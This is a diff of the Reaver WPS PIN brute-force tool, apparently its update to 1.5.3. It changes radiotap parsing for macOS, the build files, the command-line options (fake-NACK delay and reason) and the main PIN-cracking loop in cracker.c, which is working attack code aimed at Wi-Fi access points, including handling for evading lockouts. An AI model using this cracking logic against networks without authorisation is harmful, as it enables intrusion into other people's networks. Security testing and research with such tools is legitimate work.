	42	struct pcap_pkthdr *pkt_header = NULL;
	43	int status = 1;
	44	while ((status = pcap_next_ex(get_handle(), &pkt_header, &packet)) == 1 \|\| status == 0) // status == 0 indicates timeout
	45	#else
41	46	while((packet = pcap_next(get_handle(), header)) != NULL)
42		{
	47	#endif
	48	{
	49
	50	#ifdef __APPLE__
	51	if (status == 0) continue;
	52	memcpy(header, pkt_header, sizeof(*header));
	53	#endif
	54
43	55	if(get_validate_fcs())
44	56	{
45	57	if(check_fcs(packet, header->len))

48	60	}
49	61	else
50	62	{
	63	#ifndef __APPLE__
51	64	cprintf(INFO, "[!] Found packet with bad FCS, skipping...\n");
	65	#endif
52	66	}
53	67	}
54	68	else

72	86	struct dot11_frame_header *frame_header = NULL;
73	87	struct beacon_management_frame *beacon = NULL;
74	88	int channel = 0;
75		size_t tag_offset = 0;
76	89	time_t start_time = 0;
77	90
78	91	set_ap_capability(0);

99	112	set_ap_capability(beacon->capability);
100	113
101	114	/* Obtain the SSID and channel number from the beacon packet */
102		tag_offset = rt_header->len + sizeof(struct dot11_frame_header) + sizeof(struct beacon_management_frame);
103	115	channel = parse_beacon_tags(packet, header.len);
104	116
105	117	/* If no channel was manually specified, switch to the AP's current channel */

608	620	if(has_rt_header())
609	621	{
610	622	rt_header = (struct radio_tap_header *) packet;
	623
	624	#ifdef __APPLE__
	625	unsigned char body = (unsigned char) (rt_header+1);
	626	uint32_t present = rt_header->flags;
	627	uint8_t rflags = 0;
	628	int i;
	629	for (i = IEEE80211_RADIOTAP_TSFT; i <= IEEE80211_RADIOTAP_EXT; i++) {
	630	if (!(present & (1 << i))) continue;
	631	switch (i) {
	632	case IEEE80211_RADIOTAP_TSFT:
	633	body += sizeof(uint64_t);
	634	break;
	635
	636	case IEEE80211_RADIOTAP_FLAGS:
	637	rflags = ((uint8_t)body);
	638	/* fall through */
	639	case IEEE80211_RADIOTAP_RATE:
	640	body += sizeof(uint8_t);
	641	break;
	642
	643	case IEEE80211_RADIOTAP_CHANNEL:
	644	body += sizeof(uint16_t)*2;
	645	break;
	646
	647	case IEEE80211_RADIOTAP_RX_FLAGS:
	648	case IEEE80211_RADIOTAP_FHSS:
	649	body += sizeof(uint16_t);
	650	break;
	651
	652	case IEEE80211_RADIOTAP_DB_ANTSIGNAL:
	653	case IEEE80211_RADIOTAP_DBM_ANTNOISE:
	654	case IEEE80211_RADIOTAP_DBM_ANTSIGNAL:
	655	case IEEE80211_RADIOTAP_DB_ANTNOISE:
	656	case IEEE80211_RADIOTAP_ANTENNA:
	657	body++;
	658	break;
	659
	660	case 18: // IEEE80211_RADIOTAP_XCHANNEL
	661	body += sizeof(uint32_t);
	662	body += sizeof(uint16_t);
	663	body += sizeof(uint8_t);
	664	body += sizeof(uint8_t);
	665	break;
	666
	667	case 19: // IEEE80211_RADIOTAP_MCS
	668	body += 3*sizeof(uint8_t);
	669	break;
	670
	671	default:
	672	i = IEEE80211_RADIOTAP_EXT+1;
	673	break;
	674	}
	675	}
	676	#define IEEE80211_RADIOTAP_F_BADFCS 0x40
	677	if (rflags & IEEE80211_RADIOTAP_F_BADFCS) {
	678	// bad FCS, ignore
	679	return 0;
	680	}
	681	if (!(rflags & IEEE80211_RADIOTAP_F_FCS)) {
	682	// fcs not always present
	683	return 1;
	684	}
	685	#endif
	686
611	687	offset += rt_header->len;
612	688	}
613	689

+5

-1

src/80211.h less more

35	35
36	36	#include "defs.h"
37	37	#include "globule.h"
	38	#include <libwps.h>
38	39	#include "argsparser.h"
39		#include "sql.h"
40	40	#include "builder.h"
41	41	#include "iface.h"
42	42	#include "crc.h"
43	43	#include "wps.h"
	44
	45	#ifdef __APPLE__
	46	#include "utils/radiotap.h"
	47	#endif
44	48
45	49	#define AUTH_OK 1
46	50	#define ASSOCIATE_OK 2

+50

-39

src/Makefile.in less more

0	0	CC=@CC@
1		LIBWPS_DIR=libwps
2		INC=-I$(LIBWPS_DIR)
	1	INC=-Ilibwps -I.
3	2	prefix=@prefix@
4	3	exec_prefix=@exec_prefix@
5	4	CONFDIR=@sysconfdir@/@target@
6		CFLAGS=-DCONF_DIR='"$(CONFDIR)"' -DREAVER_DATABASE='"$(CONFDIR)/reaver.db"' @CFLAGS@
7		LDFLAGS=$(LIBWPS_DIR)/.o wps/.o tls/bignum.o tls/libtls.a utils/libutils.a crypto/libcrypto.a lwe/libiw.a @LDFLAGS@
	5	CFLAGS=-DCONF_DIR='"$(CONFDIR)"' @CFLAGS@ -Wno-unused-function
	6
	7	WPS_OBJS=wps/wps_attr_build.o wps/wps_attr_parse.o wps/wps_attr_process.o \
	8	wps/wps.o wps/wps_common.o wps/wps_dev_attr.o wps/wps_enrollee.o \
	9	wps/wps_registrar.o wps/wps_ufd.o
	10
	11
	12	LIB_OBJS=libwps/libwps.o $(WPS_OBJS) utils/libutils.a \
	13	crypto/libcrypto.a tls/libtls.a
	14
	15	LDFLAGS=@LDFLAGS@
	16	UNAME := $(shell uname)
	17
	18	ifeq ($(UNAME), Darwin)
	19	LIBIWNAME=
	20	else
	21	LIB_OBJS+=lwe/libiw.a
	22	LIBIWNAME=libiw
	23	endif
	24
	25	WASH_OBJS=globule.o init.o misc.o 80211.o iface.o \
	26	builder.o crc.o
	27	REAVER_OBJS=argsparser.o globule.o init.o sigint.o iface.o sigalrm.o \
	28	misc.o cracker.o session.o send.o pins.o 80211.o exchange.o builder.o \
	29	keys.o crc.o
8	30
9	31	all: wash reaver
10	32
11		wash: wps libiw libwps.o argsparser.o globule.o init.o misc.o 80211.o iface.o
12		$(CC) $(CFLAGS) $(INC) wpsmon.c *.o $(LDFLAGS) -o wash
	33	$(WPS_OBJS): CFLAGS+=-I. -Iutils
13	34
14		reaver: wps libiw libwps.o argsparser.o globule.o init.o sigint.o sigalrm.o misc.o cracker.o
15		$(CC) $(CFLAGS) $(INC) wpscrack.c *.o $(LDFLAGS) -o reaver
	35	wash: $(LIBIWNAME) $(WASH_OBJS) $(LIB_OBJS)
	36	$(CC) $(CFLAGS) $(INC) wpsmon.c $(WASH_OBJS) $(LIB_OBJS) $(LDFLAGS) -o wash
16	37
17		libwps.o:
18		(cd $(LIBWPS_DIR) && make)
	38	reaver: $(LIBIWNAME) $(REAVER_OBJS) $(LIB_OBJS)
	39	$(CC) $(CFLAGS) $(INC) wpscrack.c $(REAVER_OBJS) $(LIB_OBJS) $(LDFLAGS) -o reaver
19	40
20		wps: libutils libcrypto
21		(cd wps && make)
	41	utils/libutils.a:
	42	(cd utils && $(MAKE))
22	43
23		libutils:
24		(cd utils && make)
	44	crypto/libcrypto.a: tls/libtls.a
	45	(cd crypto && $(MAKE))
25	46
26		libcrypto: libtls
27		(cd crypto && make)
28
29		libtls:
30		(cd tls && make)
	47	tls/libtls.a:
	48	(cd tls && $(MAKE))
31	49
32	50	libiw:
33		(cd lwe && make BUILD_STATIC=y libiw.a)
	51	(cd lwe && $(MAKE) BUILD_STATIC=y libiw.a)
34	52
35	53	init.o:
36	54	$(CC) $(CFLAGS) init.c -c
37
38		sql.o:
39		$(CC) $(CFLAGS) $(INC) sql.c -c
40	55
41	56	crc.o:
42	57	$(CC) $(CFLAGS) crc.c -c

59	74	session.o: globule.o
60	75	$(CC) $(CFLAGS) $(INC) session.c -c
61	76
62		80211.o: globule.o sql.o builder.o crc.o
	77	80211.o: globule.o builder.o crc.o
63	78	$(CC) $(CFLAGS) $(INC) 80211.c -c
64	79
65	80	iface.o: globule.o

83	98	globule.o:
84	99	$(CC) $(CFLAGS) globule.c -c
85	100
86		install: cleanbin
87		if [ ! -d $(CONFDIR) ]; then mkdir -p $(CONFDIR); fi
88		if [ ! -e $(CONFDIR)/reaver.db ]; then cp reaver.db $(CONFDIR)/reaver.db && chmod -R a+rw $(CONFDIR); fi
89		if [ -e wash ]; then cp wash @bindir@/wash; fi
90		if [ -e reaver ]; then cp reaver @bindir@/reaver; fi
	101	install: all
	102	install -d $(DESTDIR)$(CONFDIR)
	103	install -Dm 755 wash $(DESTDIR)@bindir@/wash
	104	install -Dm 755 reaver $(DESTDIR)@bindir@/reaver
91	105
92	106	clean:
93	107	rm -f ~ .o reaver wash
94	108	rm -rf *.cache config.status config.log
95		(cd utils && make clean)
96		(cd tls && make clean)
97		(cd crypto && make clean)
98		(cd wps && make clean)
99		(cd lwe && make realclean)
100		(cd $(LIBWPS_DIR) && make clean)
	109	rm -f $(LIB_OBJS)
	110	(cd utils && $(MAKE) clean)
	111	(cd tls && $(MAKE) clean)
	112	(cd crypto && $(MAKE) clean)
	113	(cd lwe && $(MAKE) realclean)
101	114	rm -f Makefile config.h
102	115
103		cleanbin:
104		rm -f @bindir@/reaver @bindir@/wash @bindir@/walsh
	116	distclean: clean
105	117
106		distclean: cleanbin clean
107		rm -rf $(CONFDIR)
	118	.PHONY: libiw clean distclean install

+43

-59

src/argsparser.c less more

0	0	/*
1	1	* Reaver - Command line processing functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

31	32	*/
32	33
33	34	#include "argsparser.h"
	35	#include "globule.h"
34	36
35	37	/* Processes Reaver command line options */
36	38	int process_arguments(int argc, char **argv)

38	40	int ret_val = EXIT_SUCCESS;
39	41	int c = 0, channel = 0;
40	42	int long_opt_index = 0;
	43	FILE *out_file;
41	44	char bssid[MAC_ADDR_LEN] = { 0 };
42	45	char mac[MAC_ADDR_LEN] = { 0 };
43		char *short_options = "W:K:b:e:m:i:t:d:c:T:x:r:g:l:o:p:s:C:1:2:ZaA5ELfnqvDShwXNP0";
	46	char *short_options = "W:K:b:e:m:i:t:d:c:T:x:r:g:l:o:p:s:C:1:2:F:R:ZA5ELfnqvDShwXNPH0I";
44	47	struct option long_options[] = {
45	48	{ "generate-pin", required_argument, NULL, 'W' },
46	49	{ "stop-in-m1", no_argument, NULL, '0' },

54	57	{ "m57-timeout", required_argument, NULL, 'T' },
55	58	{ "delay", required_argument, NULL, 'd' },
56	59	{ "lock-delay", required_argument, NULL, 'l' },
	60	{ "fake-delay", required_argument, NULL, 'F' },
	61	{ "fake-reason", required_argument, NULL, 'R' },
	62	{ "ignore-reason", no_argument, NULL, 'I' },
57	63	{ "fail-wait", required_argument, NULL, 'x' },
58	64	{ "channel", required_argument, NULL, 'c' },
59	65	{ "session", required_argument, NULL, 's' },

69	75	{ "no-nacks", no_argument, NULL, 'N' },
70	76	{ "eap-terminate", no_argument, NULL, 'E' },
71	77	{ "dh-small", no_argument, NULL, 'S' },
72		{ "auto", no_argument, NULL, 'a' },
73	78	{ "fixed", no_argument, NULL, 'f' },
74	79	{ "daemonize", no_argument, NULL, 'D' },
75	80	{ "5ghz", no_argument, NULL, '5' },

80	85	{ "exhaustive", no_argument, NULL, 'X' },
81	86	{ "help", no_argument, NULL, 'h' },
82	87	{ "pixiedust-loop", no_argument, NULL, 'P' },
	88	{ "pixiedust-log", no_argument, NULL, 'H' },
83	89	{ 0, 0, 0, 0 }
84	90	};
85	91
86	92	/* Since this function may be called multiple times, be sure to set opt index to 0 each time */
87	93	optind = 0;
	94	opterr = 0;
88	95
89	96	while((c = getopt_long(argc, argv, short_options, long_options, &long_opt_index)) != -1)
90	97	{
91	98	switch(c)
92	99	{
93		case 'W':
94		//set valor para auto get pass
	100	case 'W':
	101	//set default pin generator
95	102	set_op_gen_pin(atoi(optarg));
96	103	break;
97	104	case '0':
98		//set valor para auto get pass
	105	//set stop in m1
99	106	set_stop_in_m1(1);
100	107	break;
101	108	case 'Z':

118	125	set_iface(optarg);
119	126	break;
120	127	case 'b':
121		str2mac((unsigned char ) optarg, (unsigned char ) &bssid);
	128	str2mac(optarg, (unsigned char *) &bssid);
122	129	set_bssid((unsigned char *) &bssid);
123	130	break;
124	131	case 'e':
125	132	set_ssid(optarg);
126	133	break;
127	134	case 'm':
128		str2mac((unsigned char ) optarg, (unsigned char ) &mac);
	135	str2mac(optarg, (unsigned char *) &mac);
129	136	set_mac((unsigned char *) &mac);
130	137	break;
131	138	case 't':

168	175	case 'L':
169	176	set_ignore_locks(1);
170	177	break;
171		case 'a':
172		set_auto_detect_options(1);
173		break;
174	178	case 'o':
175		set_log_file(fopen(optarg, "w"));
	179	out_file = fopen(optarg, "w");
	180	if (out_file != NULL) {
	181	set_log_file(out_file);
	182	} else {
	183	fprintf(stderr, "[-] Cannot write to log file!\n");
	184	ret_val = EXIT_FAILURE;
	185	}
176	186	break;
177	187	case 'x':
178	188	set_fail_delay(atoi(optarg));

181	191	parse_recurring_delay(optarg);
182	192	break;
183	193	case 'g':
184		set_max_pin_attempts(atoi(optarg));
	194	set_quit_pin_attempts(atoi(optarg));
185	195	break;
186	196	case 'D':
187	197	daemonize();

215	225	break;
216	226	case 'P':
217	227	set_pixie_loop(1);
	228	break;
	229	case 'H':
	230	set_pixie_log(1);
	231	break;
	232	case 'F':
	233	set_fake_nack_delay( atoi(optarg) );
	234	break;
	235	case 'I':
	236	set_ignore_nack_reason(1);
	237	break;
	238	case 'R':
	239	set_fake_nack_reason( strtol(optarg, NULL, 0) );
	240	set_ignore_nack_reason(1);
218	241	break;
219	242	default:
220	243	ret_val = EXIT_FAILURE;

236	259	set_max_pin_attempts(P1_SIZE + P2_SIZE);
237	260	set_delay(DEFAULT_DELAY);
238	261	set_lock_delay(DEFAULT_LOCK_DELAY);
	262	set_fake_nack_delay(DEFAULT_FK_NACK_DELAY);
	263	set_last_nack_reason(-1);
	264	set_fake_nack_reason(-1);
	265	set_ignore_nack_reason(0);
239	266	set_key_status(KEY1_WIP);
240	267	set_debug(INFO);
241	268	set_auto_channel_select(1);

247	274	set_op_pixie(0);
248	275	set_op_autopass(1);
249	276	set_pixie_loop(0);
250		set_stop_in_m1(0);
251		set_op_gen_pin(0);
	277	set_pixie_log(0);
	278	set_stop_in_m1(0);
	279	set_op_gen_pin(0);
	280	set_quit_pin_attempts(-1);
252	281	}
253	282
254	283	/* Parses the recurring delay optarg */

301	330	}
302	331	}
303	332
304		/* Process auto-applied options from the database. read_ap_beacon should be called before this. */
305		void process_auto_options(void)
306		{
307		char **argv = NULL;
308		int argc = 0, i = 0;
309		char bssid = NULL, ssid = NULL;
310
311		if(get_auto_detect_options())
312		{
313		bssid = (char *) mac2str(get_bssid(), ':');
314
315
316		if(bssid)
317		{
318		/* If we didn't get the SSID from the beacon packet, check the database */
319		if(get_ssid() == NULL)
320		{
321		ssid = get_db_ssid(bssid);
322		if(ssid)
323		{
324		set_ssid(ssid);
325		free(ssid);
326		}
327		}
328
329		argv = auto_detect_settings(bssid, &argc);
330		if(argc > 1 && argv != NULL)
331		{
332		/* Process the command line arguments */
333		process_arguments(argc, argv);
334
335		/* Clean up argument memory allocation */
336		for(i=0; i<argc; i++)
337		{
338		free(argv[i]);
339		}
340		free(argv);
341		}
342
343		free(bssid);
344		}
345		}
346
347		return;
348		}

+0

-2

src/argsparser.h less more

37	37	#include <getopt.h>
38	38	#include "defs.h"
39	39	#include "iface.h"
40		#include "sql.h"
41	40	#include "config.h"
42	41
43	42	int process_arguments(int argc, char **argv);
44	43	void init_default_settings(void);
45	44	void parse_recurring_delay(char *arg);
46	45	void parse_static_pin(char *pin);
47		void process_auto_options(void);
48	46
49	47	#endif

+25

-71

src/configure less more

0	0	#! /bin/sh
1	1	# Guess values for system-dependent variables and create Makefiles.
2		# Generated by GNU Autoconf 2.69 for reaver 1.5.
	2	# Generated by GNU Autoconf 2.69 for reaver 1.5.3.
3	3	#
4	4	#
5	5	# Copyright (C) 1992-1996, 1998-2012 Free Software Foundation, Inc.

576	576	# Identity of this package.
577	577	PACKAGE_NAME='reaver'
578	578	PACKAGE_TARNAME='reaver'
579		PACKAGE_VERSION='1.5.2'
580		PACKAGE_STRING='reaver 1.5.2'
	579	PACKAGE_VERSION='1.5.3'
	580	PACKAGE_STRING='reaver 1.5.3'
581	581	PACKAGE_BUGREPORT=''
582	582	PACKAGE_URL=''
583	583

671	671	ac_subst_files=''
672	672	ac_user_opts='
673	673	enable_option_checking
	674	enable_savetocurrent
674	675	'
675	676	ac_precious_vars='build_alias
676	677	host_alias

1221	1222	# Omit some internal or obsolete options to make the list less imposing.
1222	1223	# This message is too long to be a string in the A/UX 3.1 sh.
1223	1224	cat <<_ACEOF
1224		\`configure' configures reaver 1.5 to adapt to many kinds of systems.
	1225	\`configure' configures reaver 1.5.3 to adapt to many kinds of systems.
1225	1226
1226	1227	Usage: $0 [OPTION]... [VAR=VALUE]...
1227	1228

1282	1283
1283	1284	if test -n "$ac_init_help"; then
1284	1285	case $ac_init_help in
1285		short \| recursive ) echo "Configuration of reaver 1.5:";;
	1286	short \| recursive ) echo "Configuration of reaver 1.5.3:";;
1286	1287	esac
1287	1288	cat <<\_ACEOF
	1289
	1290	Optional Features:
	1291	--disable-option-checking ignore unrecognized --enable/--with options
	1292	--disable-FEATURE do not include FEATURE (same as --enable-FEATURE=no)
	1293	--enable-FEATURE[=ARG] include FEATURE [ARG=yes]
	1294	--enable-savetocurrent saves the current session file to the directory
	1295	reaver was started from
	1296
1288	1297
1289	1298	Some influential environment variables:
1290	1299	CC C compiler command

1362	1371	test -n "$ac_init_help" && exit $ac_status
1363	1372	if $ac_init_version; then
1364	1373	cat <<\_ACEOF
1365		reaver configure 1.5
	1374	reaver configure 1.5.3
1366	1375	generated by GNU Autoconf 2.69
1367	1376
1368	1377	Copyright (C) 2012 Free Software Foundation, Inc.

1660	1669	This file contains any messages produced by compilers while
1661	1670	running configure, to aid debugging if configure makes a mistake.
1662	1671
1663		It was created by reaver $as_me 1.5, which was
	1672	It was created by reaver $as_me 1.5.3, which was
1664	1673	generated by GNU Autoconf 2.69. Invocation command line was
1665	1674
1666	1675	$ $0 $@

2806	2815
2807	2816
2808	2817	CFLAGS="-Wall $CFLAGS"
2809		LDFLAGS="-ldl -lm -lpcap -lsqlite3 $LDFLAGS"
	2818	LDFLAGS="-lm -lpcap $LDFLAGS"
2810	2819
2811	2820
2812	2821	{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for pcap_open_live in -lpcap" >&5

2854	2863
2855	2864	else
2856	2865	echo "error: pcap library not found!"; exit -1
2857		fi
2858
2859		{ $as_echo "$as_me:${as_lineno-$LINENO}: checking for sqlite3_open in -lsqlite3" >&5
2860		$as_echo_n "checking for sqlite3_open in -lsqlite3... " >&6; }
2861		if ${ac_cv_lib_sqlite3_sqlite3_open+:} false; then :
2862		$as_echo_n "(cached) " >&6
2863		else
2864		ac_check_lib_save_LIBS=$LIBS
2865		LIBS="-lsqlite3 $LIBS"
2866		cat confdefs.h - <<_ACEOF >conftest.$ac_ext
2867		/* end confdefs.h. */
2868
2869		/* Override any GCC internal prototype to avoid an error.
2870		Use char because int might match the return type of a GCC
2871		builtin and then its argument prototype would still apply. */
2872		#ifdef __cplusplus
2873		extern "C"
2874		#endif
2875		char sqlite3_open ();
2876		int
2877		main ()
2878		{
2879		return sqlite3_open ();
2880		;
2881		return 0;
2882		}
2883		_ACEOF
2884		if ac_fn_c_try_link "$LINENO"; then :
2885		ac_cv_lib_sqlite3_sqlite3_open=yes
2886		else
2887		ac_cv_lib_sqlite3_sqlite3_open=no
2888		fi
2889		rm -f core conftest.err conftest.$ac_objext \
2890		conftest$ac_exeext conftest.$ac_ext
2891		LIBS=$ac_check_lib_save_LIBS
2892		fi
2893		{ $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_cv_lib_sqlite3_sqlite3_open" >&5
2894		$as_echo "$ac_cv_lib_sqlite3_sqlite3_open" >&6; }
2895		if test "x$ac_cv_lib_sqlite3_sqlite3_open" = xyes; then :
2896		cat >>confdefs.h <<_ACEOF
2897		#define HAVE_LIBSQLITE3 1
2898		_ACEOF
2899
2900		LIBS="-lsqlite3 $LIBS"
2901
2902		else
2903		echo "error: sqlite3 library not found!"; exit -1
2904	2866	fi
2905	2867
2906	2868	ac_ext=c

3324	3286	_ACEOF
3325	3287
3326	3288	else
3327		echo "error: missing sqlite3 header files" && exit -1
	3289	echo "error: missing pcap header files" && exit -1
3328	3290	fi
3329	3291
3330	3292	done
3331	3293
3332		for ac_header in sqlite3.h
3333		do :
3334		ac_fn_c_check_header_mongrel "$LINENO" "sqlite3.h" "ac_cv_header_sqlite3_h" "$ac_includes_default"
3335		if test "x$ac_cv_header_sqlite3_h" = xyes; then :
3336		cat >>confdefs.h <<_ACEOF
3337		#define HAVE_SQLITE3_H 1
3338		_ACEOF
3339
3340		else
3341		echo "error: missing sqlite3 header files" && exit -1
3342		fi
3343
3344		done
	3294
	3295	# Check whether --enable-savetocurrent was given.
	3296	if test "${enable_savetocurrent+set}" = set; then :
	3297	enableval=$enable_savetocurrent; CFLAGS="$CFLAGS -DSAVETOCURRENT"
	3298	fi
3345	3299
3346	3300
3347	3301	cp confdefs.h config.h

3892	3846	# report actual input values of CONFIG_FILES etc. instead of their
3893	3847	# values after options handling.
3894	3848	ac_log="
3895		This file was extended by reaver $as_me 1.5, which was
	3849	This file was extended by reaver $as_me 1.5.3, which was
3896	3850	generated by GNU Autoconf 2.69. Invocation command line was
3897	3851
3898	3852	CONFIG_FILES = $CONFIG_FILES

3945	3899	cat >>$CONFIG_STATUS <<_ACEOF \|\| ac_write_fail=1
3946	3900	ac_cs_config="`$as_echo "$ac_configure_args" \| sed 's/^ //; s/[\\""\`\$]/\\\\&/g'`"
3947	3901	ac_cs_version="\\
3948		reaver config.status 1.5
	3902	reaver config.status 1.5.3
3949	3903	configured by $0, generated by GNU Autoconf 2.69,
3950	3904	with options \\"\$ac_cs_config\\"
3951	3905

+8

-5

src/configure.ac less more

0		AC_INIT(reaver, 1.5)
	0	AC_INIT(reaver, 1.5.3)
1	1
2	2	AC_PROG_CC
3	3	AC_LANG(C)
4	4
5	5	CFLAGS="-Wall $CFLAGS"
6		LDFLAGS="-ldl -lm -lpcap -lsqlite3 $LDFLAGS"
	6	LDFLAGS="-lm -lpcap $LDFLAGS"
7	7
8	8	AC_CHECK_LIB(pcap, pcap_open_live, [], [echo "error: pcap library not found!"; exit -1])
9		AC_CHECK_LIB(sqlite3, sqlite3_open, [], [echo "error: sqlite3 library not found!"; exit -1])
10	9	AC_CHECK_HEADERS([stdlib.h stdint.h string.h],[],[echo "error: missing standard header files" && exit -1])
11		AC_CHECK_HEADERS([pcap.h],[],[echo "error: missing sqlite3 header files" && exit -1])
12		AC_CHECK_HEADERS([sqlite3.h],[],[echo "error: missing sqlite3 header files" && exit -1])
	10	AC_CHECK_HEADERS([pcap.h],[],[echo "error: missing pcap header files" && exit -1])
	11
	12	AC_ARG_ENABLE(savetocurrent,
	13	AC_HELP_STRING([--enable-savetocurrent],
	14	[saves the current session file to the directory reaver was started from])
	15	, [ CFLAGS="$CFLAGS -DSAVETOCURRENT" ])
13	16
14	17	cp confdefs.h config.h
15	18

+132

-39

src/cracker.c less more

0	0	/*
1	1	* Reaver - Main cracking functions
2	2	* Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
	3	* Copyright (c) 2016, Koko Software, Adrian Warecki <[email protected]>
3	4	*
4	5	* This program is free software; you can redistribute it and/or modify
5	6	* it under the terms of the GNU General Public License as published by

31	32	*/
32	33
33	34	#include "cracker.h"
	35	#include "globule.h"
34	36
35	37	time_t last_display = 0;
36	38	int last_attempts = 0;

38	40	/* Brute force all possible WPS pins for a given access point */
39	41	void crack()
40	42	{
41		unsigned char *bssid = NULL;
	43	char *bssid = NULL;
42	44	char *pin = NULL;
43		int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0;
	45	int fail_count = 0, loop_count = 0, sleep_count = 0, assoc_fail_count = 0, pin_attempts = 0;
44	46	time_t start_time = 0;
45	47	enum wps_result result = 0;
46	48

77	79	*/
78	80	cprintf(INFO, "[+] Waiting for beacon from %s\n", bssid);
79	81	read_ap_beacon();
80		process_auto_options();
81	82
82	83	/* I'm fairly certian there's a reason I put this in twice. Can't remember what it was now though... */
83	84	if(get_max_pin_attempts() == -1)

123	124	/* Main cracking loop */
124	125	for(loop_count=0, sleep_count=0; get_key_status() != KEY_DONE; loop_count++, sleep_count++)
125	126	{
126		/*
127		* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
128		* registrar requests. Using a delay here can help prevent the AP from locking us out.
129		*/
130		pcap_sleep(get_delay());
131	127
132	128	/* Users may specify a delay after x number of attempts */
133	129	if((get_recurring_delay() > 0) && (sleep_count == get_recurring_delay_count()))

165	161	}
166	162	else
167	163	{
168		cprintf(WARNING, "[+] Trying pin %s.\n", pin);
	164	cprintf(WARNING, "[+] Trying pin %s\n", pin);
169	165	}
170	166
171	167	/*

193	189	*/
194	190	result = do_wps_exchange();
195	191
	192	/*
	193	* The WPA key and other settings are stored in the globule->wps structure. If we've
	194	* recovered the WPS pin and parsed these settings, don't free this structure. It
	195	* will be freed by wpscrack_free() at the end of main().
	196	*/
	197	if(get_key_status() != KEY_DONE)
	198	{
	199	// We have to free wps, before making any call to pcap_sleep! Otherwise we should except Segmentation fault on SIGINT.
	200	wps_deinit(get_wps());
	201	set_wps(NULL);
	202	}
	203	/* If we have cracked the pin, save a copy */
	204	else
	205	{
	206	set_pin(pin);
	207	}
	208
	209
196	210	switch(result)
197	211	{
198	212	/*

203	217	case KEY_REJECTED:
204	218	fail_count = 0;
205	219	advance_pin_count();
	220	pin_attempts++;
206	221	cprintf(WARNING, "[+] Pin count advanced: %i. Max pin attempts: %i\n", get_pin_count(), get_max_pin_attempts());
207	222	break;
208	223	/* Got it!! */
209	224	case KEY_ACCEPTED:
	225	break;
	226	case FAKE_NACK:
	227	cprintf(WARNING, "[!] WARNING: Fake NACK detected, waiting %d seconds before re-checking\n", get_fake_nack_delay());
	228	pcap_sleep(get_fake_nack_delay());
	229	fail_count = 0;
210	230	break;
211	231	/* Unexpected timeout or EAP failure...try this pin again */
212	232	default:

232	252	}
233	253
234	254	/*
235		* The WPA key and other settings are stored in the globule->wps structure. If we've
236		* recovered the WPS pin and parsed these settings, don't free this structure. It
237		* will be freed by wpscrack_free() at the end of main().
	255	* Some APs may do brute force detection, or might not be able to handle an onslaught of WPS
	256	* registrar requests. Using a delay here can help prevent the AP from locking us out.
238	257	*/
239	258	if(get_key_status() != KEY_DONE)
240		{
241		wps_deinit(get_wps());
242		set_wps(NULL);
243		}
244		/* If we have cracked the pin, save a copy */
245		else
246		{
247		set_pin(pin);
248		}
	259	pcap_sleep(get_delay());
	260
249	261	free(pin);
250	262	pin = NULL;
251	263
252	264	/* If we've hit our max number of pin attempts, quit */
253		if((get_max_pin_attempts() > 0) &&
254		(get_pin_count() == get_max_pin_attempts()))
255		{
256		if(get_exhaustive()){
257		cprintf(WARNING, "[+] Quitting after %d crack attempts\n", get_max_pin_attempts());
258		break;
259		}
260		else
261		{
262		cprintf(WARNING, "[+] Checksum mode was not successful. Starting exhaustive attack\n");
263		set_exhaustive(1);
264		set_p2_index(0);
265		}
	265	if (get_cracking_done() \|\| (pin_attempts == get_quit_pin_attempts()) )
	266	{
	267	cprintf(WARNING, "[+] Quitting after %d crack attempts\n", pin_attempts);
	268	break;
266	269	}
267	270	}
268	271

310	313	return pin_count;
311	314	}
312	315
313		/* Displays the status and rate of cracking */
	316	/* Return non zero to quit reaver. */
	317	int get_cracking_done()
	318	{
	319	if(get_key_status() == KEY1_WIP)
	320	{
	321	if (get_pin_count() == P1_SIZE)
	322	{
	323	if(get_exhaustive()){
	324	cprintf(WARNING, "[+] First half of pin was not found. Restarting attack.\n");
	325	set_p1_index(0);
	326	return 0;
	327	}
	328	else
	329	{
	330	return 1;
	331	}
	332	}
	333	}
	334	else if(get_key_status() == KEY2_WIP)
	335	{
	336	if( (get_max_pin_attempts() > 0) && (get_pin_count() == get_max_pin_attempts()) )
	337	{
	338	/* Exhaustive mode isn't enabled. */
	339	if(get_exhaustive() == 0)
	340	{
	341	cprintf(WARNING, "[+] Checksum mode was not successful. Starting exhaustive attack\n");
	342	set_exhaustive(2);
	343	set_p2_index(0);
	344	return 0;
	345	} else
	346	/* User activated exhaustive mode. */
	347	if(get_exhaustive() == 1)
	348	{
	349	cprintf(WARNING, "[+] Second half of pin was not found. Restarting attack.\n");
	350	set_p2_index(0);
	351	return 0;
	352	} else
	353	/* Automatic exhaustive mode. */
	354	if (get_exhaustive() == 2)
	355	{
	356	return 1;
	357	}
	358	}
	359	}
	360	return 0;
	361	}
	362
	363	char *get_max_time_remaining(int average, int attempts_remaining)
	364	{
	365	char *max_time, hours[8], minutes[3], seconds[3];
	366	int max_hours = 0, max_minutes = 0, max_seconds = 0;
	367
	368	max_time = malloc(16);
	369
	370	if(!max_time)
	371	exit(-1);
	372
	373	if(average)
	374	{
	375	max_seconds = attempts_remaining * average;
	376	if(max_seconds > 60)
	377	{
	378	max_minutes = max_seconds / 60;
	379	max_seconds -= max_minutes * 60;
	380	}
	381	if(max_minutes > 60)
	382	{
	383	max_hours = max_minutes / 60;
	384	max_minutes -= max_hours * 60;
	385	}
	386
	387	if(max_seconds < 0 \|\| max_minutes < 0 \|\| max_hours < 0)
	388	{
	389	free(max_time);
	390	return NULL;
	391	}
	392
	393	sprintf(hours, "%d", max_hours);
	394	sprintf(minutes, "%s%d", max_minutes > 9 ? "" : "0", max_minutes);
	395	sprintf(seconds, "%s%d", max_seconds > 9 ? "" : "0", max_seconds);
	396
	397	sprintf(max_time, "%s:%s:%s", hours, minutes, seconds);
	398	}
	399	else
	400	{
	401	free(max_time);
	402	return NULL;
	403	}
	404
	405	return max_time;
	406	}
	407
	408	//Displays the status and rate of cracking
314	409	void display_status(time_t start_time)
315	410	{
316	411	float percentage = 0;

322	417	{
